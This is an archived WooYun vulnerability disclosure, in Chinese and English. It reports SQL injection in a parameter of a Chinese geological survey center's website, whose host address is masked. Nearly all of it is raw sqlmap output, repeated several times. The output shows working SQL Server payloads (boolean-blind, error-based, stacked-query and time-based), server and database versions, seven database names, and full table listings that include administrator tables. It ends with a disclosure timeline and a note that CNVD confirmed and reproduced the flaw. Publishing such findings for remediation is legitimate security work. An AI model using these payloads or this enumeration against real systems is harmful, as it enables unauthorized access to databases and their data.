乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-01: 细节已通知厂商并且等待厂商处理中 2015-11-05: 厂商已经确认,细节仅向厂商公开 2015-11-15: 细节向核心白帽子及相关领域专家公开 2015-11-25: 细节向普通白帽子公开 2015-12-05: 细节向实习白帽子公开 2015-12-20: 细节向公众公开
TS
中国地质调查局水文地质环境地质调查中心http://**.**.**.**/AchievementProjectView.aspx?id=30http://**.**.**.**/AchievementProjectView.aspx?id=30 (GET)
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=30 AND 3696=3696 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=30 AND 7660=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7660=7660) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=30; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=30 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1260=1260) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=30 AND 3696=3696 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=30 AND 7660=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7660=7660) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=30; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=30 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1260=1260) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008available databases [7]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] WaiWangsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=30 AND 3696=3696 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=30 AND 7660=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7660=7660) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=30; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=30 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1260=1260) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008available databases [7]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] WaiWangsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=30 AND 3696=3696 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=30 AND 7660=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7660=7660) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=30; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=30 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1260=1260) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(113))---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008available databases [7]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] WaiWangDatabase: ReportServerTempDB+------------------------------------------------------+---------+| Table | Entries |+------------------------------------------------------+---------+| dbo.DBUpgradeHistory | 27 |+------------------------------------------------------+---------+Database: ReportServer+------------------------------------------------------+---------+| Table | Entries |+------------------------------------------------------+---------+| dbo.DBUpgradeHistory | 31 || dbo.ConfigurationInfo | 23 || dbo.Roles | 8 || dbo.PolicyUserRole | 4 || dbo.Users | 3 || dbo.Keys | 2 || dbo.Policies | 2 || dbo.SecData | 2 || dbo.ServerUpgradeHistory | 2 || dbo.Catalog | 1 || dbo.UpgradeInfo | 1 |+------------------------------------------------------+---------+Database: master+------------------------------------------------------+---------+| Table | Entries |+------------------------------------------------------+---------+| sys.messages | 98318 || sys.sysmessages | 98318 || sys.dm_os_memory_objects | 44663 || sys.dm_os_memory_cache_entries | 16928 || sys.fulltext_system_stopwords | 15829 || sys.syscacheobjects | 14050 || sys.dm_exec_cached_plans | 13685 || sys.syscolumns | 12581 || sys.dm_os_buffer_descriptors | 9373 || sys.all_parameters | 7090 || sys.system_parameters | 7090 || sys.trace_subclass_values | 5366 || sys.all_columns | 5285 || sys.dm_exec_query_stats | 5066 || sys.system_columns | 4626 || sys.trace_event_bindings | 4304 || sys.dm_os_ring_buffers | 4034 || sys.syscomments | 2997 || sys.dm_xe_object_columns | 2674 || dbo.spt_values | 2508 || sys.all_objects | 2002 || sys.sysobjects | 2002 || sys.system_objects | 1928 || sys.database_permissions | 1853 || sys.syspermissions | 1852 || sys.sysprotects | 1848 || sys.all_sql_modules | 1785 || sys.system_sql_modules | 1783 || sys.dm_xe_map_values | 1733 || sys.dm_os_virtual_address_dump | 1614 || sys.dm_os_performance_counters | 1077 || sys.sysperfinfo | 1077 || sys.system_internals_partition_columns | 822 || sys.columns | 659 || sys.dm_xe_objects | 542 || sys.dm_os_wait_stats | 490 || sys.dm_audit_actions | 454 || sys.spatial_reference_systems | 390 || sys.dm_exec_query_transformation_stats | 377 || sys.event_notification_event_types | 365 || sys.all_views | 354 || sys.system_views | 354 || sys.stats_columns | 351 || sys.dm_db_index_usage_stats | 273 || sys.index_columns | 271 || sys.sysindexkeys | 271 || sys.trigger_event_types | 245 || sys.dm_os_memory_cache_clock_hands | 231 || sys.sysindexes | 201 || sys.dm_os_memory_clerks | 195 || sys.stats | 193 || sys.trace_events | 180 || sys.dm_os_spinlock_stats | 175 || sys.dm_os_latch_stats | 144 || sys.allocation_units | 128 || sys.system_internals_allocation_units | 128 || sys.dm_db_partition_stats | 116 || sys.indexes | 116 || sys.partitions | 116 || sys.system_internals_partitions | 116 || sys.syscharsets | 114 || sys.xml_schema_facets | 112 || sys.xml_schema_components | 99 || sys.system_components_surface_area_configuration | 95 || sys.dm_os_memory_cache_counters | 92 || sys.dm_os_loaded_modules | 85 || sys.dm_audit_class_type_map | 83 || sys.xml_schema_types | 82 || sys.objects | 74 || sys.configurations | 68 || sys.sysconfigures | 68 || sys.syscurconfigs | 68 || sys.dm_db_session_space_usage | 66 || sys.dm_db_task_space_usage | 66 || sys.dm_exec_sessions | 66 || sys.sysprocesses | 66 || sys.trace_columns | 66 || sys.dm_os_threads | 55 || sys.dm_os_worker_local_storage | 52 || sys.dm_os_workers | 52 || INFORMATION_SCHEMA.COLUMNS | 50 || sys.fulltext_document_types | 50 || sys.dm_os_memory_pools | 49 || sys.dm_os_memory_cache_hash_tables | 48 || sys.fulltext_languages | 48 || sys.dm_tran_locks | 41 || sys.syslockinfo | 41 || sys.dm_exec_connections | 40 || sys.dm_exec_query_optimizer_info | 39 || sys.systypes | 34 || sys.types | 34 || sys.syslanguages | 33 || sys.dm_os_tasks | 32 || sys.dm_exec_procedure_stats | 28 || sys.dm_exec_requests | 27 || sys.server_permissions | 23 || sys.securable_classes | 22 || sys.server_principals | 22 || sys.trace_categories | 21 || sys.database_principals | 18 || sys.sysusers | 18 || sys.xml_schema_component_placements | 18 || sys.sysaltfiles | 16 || INFORMATION_SCHEMA.SCHEMATA | 15 || sys.dm_os_stacks | 15 || sys.schemas | 15 || sys.xml_schema_attributes | 15 || sys.dm_os_waiting_tasks | 14 || sys.master_files | 14 || sys.service_message_types | 14 || sys.dm_db_script_level | 13 || sys.dm_os_schedulers | 13 || sys.syslogins | 13 || sys.service_contract_message_usages | 11 || sys.dm_xe_session_event_actions | 10 || sys.server_event_session_actions | 10 || sys.crypt_properties | 8 || sys.certificates | 7 || sys.database_mirroring | 7 || sys.database_recovery_status | 7 || sys.databases | 7 || sys.dm_tran_active_transactions | 7 || sys.dm_tran_database_transactions | 7 || sys.sysdatabases | 7 || INFORMATION_SCHEMA.TABLES | 6 || sys.dm_os_memory_brokers | 6 || sys.dm_os_memory_node_access_stats | 6 || sys.service_contracts | 6 || sys.tables | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || sys.dm_xe_session_events | 5 || sys.endpoints | 5 || sys.server_event_session_events | 5 || sys.server_role_members | 5 || sys.dm_db_missing_index_details | 4 || sys.dm_db_missing_index_group_stats | 4 || sys.dm_db_missing_index_groups | 4 || sys.dm_exec_query_resource_semaphores | 4 || sys.dm_xe_packages | 4 || sys.internal_tables | 4 || dbo.MSreplication_options | 3 || sys.assembly_types | 3 || sys.dm_broker_queue_monitors | 3 || sys.dm_clr_properties | 3 || sys.dm_os_hosts | 3 || sys.dm_xe_session_object_columns | 3 || sys.identity_columns | 3 || sys.login_token | 3 || sys.service_queue_usages | 3 || sys.service_queues | 3 || sys.services | 3 || sys.sql_logins | 3 || sys.type_assembly_usages | 3 || sys.xml_schema_namespaces | 3 || INFORMATION_SCHEMA.ROUTINES | 2 || sys.database_files | 2 || sys.database_role_members | 2 || sys.dm_fts_memory_pools | 2 || sys.dm_os_memory_nodes | 2 || sys.dm_os_nodes | 2 || sys.dm_resource_governor_resource_pools | 2 || sys.dm_resource_governor_workload_groups | 2 || sys.key_encryptions | 2 || sys.procedures | 2 || sys.resource_governor_resource_pools | 2 || sys.resource_governor_workload_groups | 2 || sys.service_contract_usages | 2 || sys.sql_modules | 2 || sys.sysfiles | 2 || sys.sysmembers | 2 || sys.tcp_endpoints | 2 || dbo.spt_monitor | 1 || sys.assemblies | 1 || sys.assembly_files | 1 || sys.data_spaces | 1 || sys.default_constraints | 1 || sys.dm_db_file_space_usage | 1 || sys.dm_exec_background_job_queue_stats | 1 || sys.dm_fts_fdhosts | 1 || sys.dm_os_dispatcher_pools | 1 || sys.dm_os_dispatchers | 1 || sys.dm_os_process_memory | 1 || sys.dm_os_sys_info | 1 || sys.dm_os_sys_memory | 1 || sys.dm_resource_governor_configuration | 1 || sys.dm_tran_current_transaction | 1 || sys.dm_tran_session_transactions | 1 || sys.dm_xe_session_targets | 1 || sys.dm_xe_sessions | 1 || sys.filegroups | 1 || sys.linked_logins | 1 || sys.resource_governor_configuration | 1 || sys.routes | 1 || sys.server_event_session_fields | 1 || sys.server_event_session_targets | 1 || sys.server_event_sessions | 1 || sys.servers | 1 || sys.symmetric_keys | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysoledbusers | 1 || sys.sysservers | 1 || sys.traces | 1 || sys.user_token | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+------------------------------------------------------+---------+Database: msdb+------------------------------------------------------+---------+| Table | Entries |+------------------------------------------------------+---------+| dbo.MSdbms_datatype_mapping | 493 || dbo.sysdatatypemappings | 493 || dbo.MSdbms_map | 374 || dbo.MSdatatype_mappings | 260 || dbo.MSdbms_datatype | 180 || dbo.syspolicy_facet_events | 84 || dbo.sysutility_mi_smo_properties_to_collect_internal | 84 || dbo.syspolicy_management_facets | 83 || dbo.sysutility_ucp_policy_target_conditions | 24 || dbo.sysutility_ucp_policy_target_conditions_internal | 24 || dbo.syscategories | 21 || dbo.backupfile | 16 || dbo.sysutility_ucp_configuration | 13 || dbo.sysutility_ucp_configuration_internal | 13 || dbo.syssubsystems | 12 || dbo.sysutility_ucp_policy_check_conditions | 12 || dbo.sysutility_ucp_policy_check_conditions_internal | 12 || dbo.backupfilegroup | 8 || dbo.backupset | 8 || dbo.MSdbms | 8 || dbo.restorefile | 8 || dbo.sysschedules | 8 || dbo.sysschedules_localserver_view | 8 || dbo.sysssispackages | 8 || dbo.sysutility_ucp_supported_object_types_internal | 8 || dbo.sysmail_configuration | 7 || dbo.syscollector_collection_items | 6 || dbo.syscollector_collection_items_internal | 6 || dbo.syscollector_config_store | 5 || dbo.syscollector_config_store_internal | 5 || dbo.sysmanagement_shared_server_groups | 5 || dbo.sysmanagement_shared_server_groups_internal | 5 || dbo.sysutility_mi_smo_objects_to_collect_internal | 5 || dbo.backupmediafamily | 4 || dbo.backupmediaset | 4 || dbo.restorefilegroup | 4 || dbo.restorehistory | 4 || dbo.syscollector_collection_sets | 4 || dbo.syscollector_collection_sets_internal | 4 || dbo.syscollector_collector_types | 4 || dbo.syscollector_collector_types_internal | 4 || dbo.syspolicy_configuration | 4 || dbo.syspolicy_configuration_internal | 4 || dbo.sysssispackagefolders | 4 || dbo.sysdtscategories | 3 || dbo.sysjobsteps | 3 || dbo.sysutility_ucp_policy_configuration | 2 || dbo.sysdbmaintplans | 1 || dbo.sysjobs | 1 || dbo.sysjobs_view | 1 || dbo.sysjobschedules | 1 || dbo.sysjobservers | 1 || dbo.sysmail_servertype | 1 || dbo.sysoriginatingservers_view | 1 || dbo.systargetservers_view | 1 || dbo.sysutility_mi_configuration | 1 || dbo.sysutility_ucp_processing_state_internal | 1 || dbo.sysutility_ucp_utility_space_utilization | 1 |+------------------------------------------------------+---------+Database: WaiWang+------------------------------------------------------+---------+| Table | Entries |+------------------------------------------------------+---------+| dbo.news_photo | 1945 || dbo.news_info | 1818 || dbo.View_news_info | 1818 || dbo.Achievement_periodical | 468 || dbo.news_file | 295 || dbo.Achievement_manual_part | 228 || dbo.Achievement_info_photo | 58 || dbo.sys_role_right | 58 || dbo.sys_menu | 42 || dbo.Achievement_info | 27 || dbo.sys_adm | 13 || dbo.sys_role | 12 || dbo.news_video | 9 || dbo.news_zhuanti | 5 || dbo.Achievement_project | 4 || dbo.View_achievement_project | 4 || dbo.Achievement_papers | 3 || dbo.Achievement_manual | 2 || dbo.sys_adm_role | 2 || dbo.Achievement_map | 1 |+------------------------------------------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-11-05 14:21
CNVD确认并复现所述情况,已经转由CNCERT向中国地震调查局上报,由其后续协调网站管理单位处置.
暂无